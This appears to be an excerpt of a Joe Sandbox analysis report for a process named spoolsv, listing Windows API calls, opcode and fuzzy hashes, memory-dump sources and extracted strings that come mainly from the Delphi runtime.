                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                              • Instruction ID: f853e9a10902f6070be34d089937fca734024750f852f86f0bde1e340560638e
                                                                              • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                              • Instruction Fuzzy Hash: 20E0D8357003241BD312A5585C80DF6B36D9B5C310F0041FEBD4CC7341EEA09D484EE8
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,02B4C106,00000000,02B4C11E), ref: 02B2B722
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: 1d7bbda1e43a5cd99077805af796830e30508bcc79f24233d73ce0d6a8fa654a
                                                                              • Instruction ID: ded53c970a950e66d46fecff241b851874ced05ce38db4d2dac81a5a5cbaba93
                                                                              • Opcode Fuzzy Hash: 1d7bbda1e43a5cd99077805af796830e30508bcc79f24233d73ce0d6a8fa654a
                                                                              • Instruction Fuzzy Hash: A3F0DA78A443129FD350DF28D580F1577E5FB49B54F804969E89CC7390EB389418CF52
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BDFA,00000000,02B2C013,?,?,00000000,00000000), ref: 02B2A7AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                              • Instruction ID: b8ff15bd3f31c9c69adee13f8d4df7ed8b7636dc634aee7ed022388427aa5d8c
                                                                              • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                              • Instruction Fuzzy Hash: 2AD05EB630E3702AA220515A2D94DBB6AECCBC97A1F0084BEF54CC6250D2008C0A96B5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID:
                                                                              • API String ID: 481472006-0
                                                                              • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                              • Instruction ID: 2172b8c1bf90d8fd47c673e84136d5d5999d84b6ffb7ec30655d161e2957ab61
                                                                              • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                              • Instruction Fuzzy Hash: 8EA0121040483001854037180C0217531445900620FC40FC068FC503D0ED1D012440D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0f56f3054fdfae3a9e0b757889bd925eef135c19a792c03671ae923f9a3e3bd2
                                                                              • Instruction ID: abdc6379b229dd3eb8d3086f0a6927463cee8b6a421fe5a3d55f6da87c7db522
                                                                              • Opcode Fuzzy Hash: 0f56f3054fdfae3a9e0b757889bd925eef135c19a792c03671ae923f9a3e3bd2
                                                                              • Instruction Fuzzy Hash: 9A515FE64193C24FC7635F7494D62C23FA1ED6322874A16DAC8E08F2A7E619494BDF21
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D225
                                                                                • Part of subcall function 02B2D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B2D209
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                              • API String ID: 1646373207-1918263038
                                                                              • Opcode ID: 1b0b86f5c357f3b32760d5adc262c4556f1ebbf220223858cc0fbfdef1a1eecf
                                                                              • Instruction ID: fa8d22e7a849ef73e9b282572333919b4a6fe78173c09bfd3dd1bbc5d3788364
                                                                              • Opcode Fuzzy Hash: 1b0b86f5c357f3b32760d5adc262c4556f1ebbf220223858cc0fbfdef1a1eecf
                                                                              • Instruction Fuzzy Hash: A0416C63A953365E1208AF6D780002B7BDAD79839037045DAB05CCBB45DE30BC9E8E2E
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36E66
                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36E77
                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36E87
                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36E97
                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36EA7
                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36EB7
                                                                              • GetProcAddress.KERNEL32(00000002), ref: 02B36EC7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                              • API String ID: 667068680-2233174745
                                                                              • Opcode ID: 4f561ca58af776411ae1bfbf499db2bea7daa49d556d18dc4f8b902dd4bdfb63
                                                                              • Instruction ID: d7fce8a466dabf13bea27f2badd79a2f773f3a2bd86deaa9116b3b838301fef6
                                                                              • Opcode Fuzzy Hash: 4f561ca58af776411ae1bfbf499db2bea7daa49d556d18dc4f8b902dd4bdfb63
                                                                              • Instruction Fuzzy Hash: E9F0C0B5A8D3727EB3137F709CC18673BDDA70074470019E6761A96A12DAB4C81C4F68
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                              • API String ID: 2030045667-32948583
                                                                              • Opcode ID: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
                                                                              • Instruction ID: ef074bb8b2e0ef6134537f12044adc3609150cac9be9238bd9d79d37fc45beac
                                                                              • Opcode Fuzzy Hash: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
                                                                              • Instruction Fuzzy Hash: 6AA1B131A043788BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB386CB7599CECF51
                                                                              Strings
                                                                              • , xrefs: 02B22814
                                                                              • Unexpected Memory Leak, xrefs: 02B228C0
                                                                              • An unexpected memory leak has occurred. , xrefs: 02B22690
                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
                                                                              • bytes: , xrefs: 02B2275D
                                                                              • 7, xrefs: 02B226A1
                                                                              • The unexpected small block leaks are:, xrefs: 02B22707
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                              • API String ID: 0-2723507874
                                                                              • Opcode ID: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
                                                                              • Instruction ID: 52f48dc29ee7f02ac22b639924af9f6a8f66314d1e7bdd7a70e2c2592ca10a98
                                                                              • Opcode Fuzzy Hash: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
                                                                              • Instruction Fuzzy Hash: 5D719230A043788FDB21AA2CCC84BD9BAE5EB09754F1041E5D94DEB281DB759AC9CF51
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(00000000,02B2C013,?,?,00000000,00000000), ref: 02B2BD7E
                                                                                • Part of subcall function 02B2A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread
                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 4232894706-2493093252
                                                                              • Opcode ID: c168e91f6bb4268ebd73dcd8150f1719985f96eb0cb742bf9bf5f0482046a028
                                                                              • Instruction ID: 5e498b7573639faf26b5cb8028c615a480f316ce3c9487d8f80047590d408225
                                                                              • Opcode Fuzzy Hash: c168e91f6bb4268ebd73dcd8150f1719985f96eb0cb742bf9bf5f0482046a028
                                                                              • Instruction Fuzzy Hash: 3C617035B003689BDB00FBA4DC90A9F77BBDF49340F5198F5A108AB651CA34D90D8B69
                                                                              APIs
                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AE40
                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3AE57
                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AEEB
                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3AEF7
                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3AF0B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Read$HandleModule
                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                              • API String ID: 2226866862-113032527
                                                                              • Opcode ID: db0f4b1871a2128a498c280d792da06bce7148c808bca3401c0cd4c9475171f6
                                                                              • Instruction ID: 6156d26e41fd9e59d9dea58da5138f76494848f852c6256bfb0303f022dff86f
                                                                              • Opcode Fuzzy Hash: db0f4b1871a2128a498c280d792da06bce7148c808bca3401c0cd4c9475171f6
                                                                              • Instruction Fuzzy Hash: 7B3162B2A40314BBDB12DF68CC85F9977A8EF05714F204194FA98EB280D374A950CBA5
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B24365
                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B2436B
                                                                              • GetStdHandle.KERNEL32(000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8), ref: 02B24380
                                                                              • WriteFile.KERNEL32(00000000,000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?), ref: 02B24386
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite$Message
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 1570097196-2970929446
                                                                              • Opcode ID: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
                                                                              • Instruction ID: 307a2fde8b0f9d07f7b8676dad534f2884633019e781f05f1b82ac8d85953777
                                                                              • Opcode Fuzzy Hash: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
                                                                              • Instruction Fuzzy Hash: 7BF02B71AD033074F710A7646D46F59276C4B05F55F104AD4F23C994D18BB490CCDB26
                                                                              APIs
                                                                                • Part of subcall function 02B2ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACE1
                                                                                • Part of subcall function 02B2ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD05
                                                                                • Part of subcall function 02B2ACC4: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD20
                                                                                • Part of subcall function 02B2ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADB6
                                                                              • CharToOemA.USER32(?,?), ref: 02B2AE83
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEA0
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEA6
                                                                              • GetStdHandle.KERNEL32(000000F4,02B2AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEBB
                                                                              • WriteFile.KERNEL32(00000000,000000F4,02B2AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEC1
                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AEE3
                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AEF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                              • String ID:
                                                                              • API String ID: 185507032-0
                                                                              • Opcode ID: efd2c5888a41ad47375ea85121990330881d917d058ccea574fa122897c21dc8
                                                                              • Instruction ID: af0659d30ced3008812e31aae4b7f2e04200818df9295ec73722d3bb0d1541d5
                                                                              • Opcode Fuzzy Hash: efd2c5888a41ad47375ea85121990330881d917d058ccea574fa122897c21dc8
                                                                              • Instruction Fuzzy Hash: 9B1170B25443547AD201FB94DC80F9B77EEAB44700F40099AB75CD70E0DA70E94C8F26
                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E5AD
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E5C9
                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E602
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E67F
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E698
                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 02B2E6CD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                              • String ID:
                                                                              • API String ID: 351091851-0
                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                              • Instruction ID: 7e6eda4f5ff4297ab5b1269a15252b9d57f392023d5c303bb5c8731c489f1271
                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                              • Instruction Fuzzy Hash: E351B575A0073A9BCB22EB59C880BD9B3BDAF4D300F4442D5E50DA7246D630EF898F65
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                              • RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
